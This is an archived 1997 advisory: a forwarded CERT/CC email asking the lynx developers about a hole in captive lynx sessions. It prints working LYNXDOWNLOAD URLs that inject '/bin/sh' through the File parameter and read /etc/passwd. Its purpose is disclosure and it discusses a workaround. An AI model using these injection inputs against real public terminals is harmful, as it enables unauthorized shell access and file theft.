Obtain an interactive shell through lynx

Summary
Description:It is possible to obtain an interactive shell via special LYNXDOWNLOAD URLs. This is a big security hole for sites that use lynx "guest accounts" and other public services.
Author:Unknown
Compromise:run unauthorized arbitrary commands
Vulnerable Systems:Sites trying to keep visitors captive in a lynx session.
Date:23 June 1997
Details


Date: Thu, 17 Jul 1997 16:42:22 -0000
From: brush@SEARCH.POL.PL
To: BUGTRAQ@NETSPACE.ORG
Subject: msg00234.html

     _________________________________________________________________

   [Prev][Next][Index][Thread]

                 LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd)

     _________________________________________________________________

     * To: Lynx Development <lynx-dev@sig.net>
     * Subject: LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd)
     * From: Duncan Hill <dhill@sunbeach.net>
     * Date: Tue, 24 Jun 1997 07:56:04 +0400 (GMT-4)
     * cc: Roger Hill <rhill@stobyn.ml.org>
     * Reply-To: lynx-dev@sig.net
     * Sender: owner-lynx-dev@quartz.netop.sig.net

     _________________________________________________________________

I'm not sure if the entire list got this.  I got it because I'm still
subscribed to the raven list :)  So, here it is in case nobody's seen
it yet.

Duncan Hill
------------------------------------------------------------------------------

---------- Forwarded message ----------
Date: Mon, 23 Jun 1997 17:52:06 -0400 (EDT)
From: "CERT(sm) Coordination Center" <cert@cert.org>
To: Lynx Developers <lynx-dev@raven.cc.ukans.edu>
Cc: "CERT(sm) Coordination Center" <cert@cert.org>
Subject: VU#5135 (Lynx vulnerability?)

-----BEGIN PGP SIGNED MESSAGE-----

Hello folks,

We have received a report of a potential vulnerability with lynx, which we
wanted to check with you on.

When you start up a lynx client session, you can hit "g" (for Goto) and
then enter the following URL:

        URL to open: LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/
dev/null
        Enter a filename: /dev/null
        File exists. Overwrite? (y/n) y

This then gives a shell on the client machine on which the lynx process is
executing.


Similarly, you can copy and inspect arbitrary files on the local system
thus:

        LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdout
        Enter a filename: /dev/stdout
        File exists. Overwrite? (y/n) y

This returns a copy of the /etc/password file to the user's browser
session.

Normally this may not be a problem if you are executing lynx from your
local account on your workstation.

However, if you are running lynx as a captive information service (as
discussed on the lynx man page), then this means that an attacker can run
arbitrary commands and inspect arbitrary files on the victim system without
authorization.

We are aware of one site where you can telnet to the system, and without
any authentication process, the user is given a lynx browser session.  By
entering the URL above, an attacker would then be able to obtain an
interactive shell on that system without having been authenticated.

We would be interested in knowing whether this is a known problem.  The
reporter suggested that disabling downloads would be an appropriate
workaround.  If you are in agreement with this, is this a feature that is
enabled by default?  (This would require the captive session to be started
using the "-restrictions=download" option, wouldn't it?)

If this is a known problem, have you any suggestions as to the solution, or
any idea whether patches are (or would be) available to address these
problems?

We would appreciate any feedback that you may have on these questions.
Thanks very much for your time.

Regards,
Rob.

| Rob McMillan                          Email:     cert@cert.org
|| CERT Coordination Center (*)         Phone:     +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute      Fax:       +1 (412) 268 6989
|||| Carnegie Mellon University         Web:       http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890        Timezone:  GMT-5 (EST)

* CERT is registered with the U.S. Patent and Trademark Office. The Software
  Engineering Institute is sponsored by the U.S. Department of Defense.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBM67vzXVP+x0t4w7BAQGFjQP9FEqS0OicRpyWTzd6e9MHj26XBWWfb9Kw
izdrbMhkH/KOYnUF1Cq+1QeIb0DbeipBNTVJLXFRBoT0Ztk+e5loH+Ggr8zRU/sn
dH9R2fS88F0XWtX7MXvFuiVIq5EtkoPXZc59FvvTC45qWub7+m5wW8Gb1wOvfXIs
tT1YSXP1vxE=
=86zo
-----END PGP SIGNATURE-----

;
; To UNSUBSCRIBE:  Send a mail message to majordomo@sig.net
;                  with "unsubscribe lynx-dev" (without the
;                  quotation marks) on a line by itself.
;

     _________________________________________________________________

   Follow-Ups:
     * Re: LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd)
          + From: Andrew Kuchling <amk@magnet.com>

     _________________________________________________________________

     * Prev: Re: LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd)
     * Next: LYNX-DEV Missing people
     * Index(es):
          + Main
          + Thread

     _________________________________________________________________

   Lynx mailing list archives

   [FLORA HOME] [LYNX Home]

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: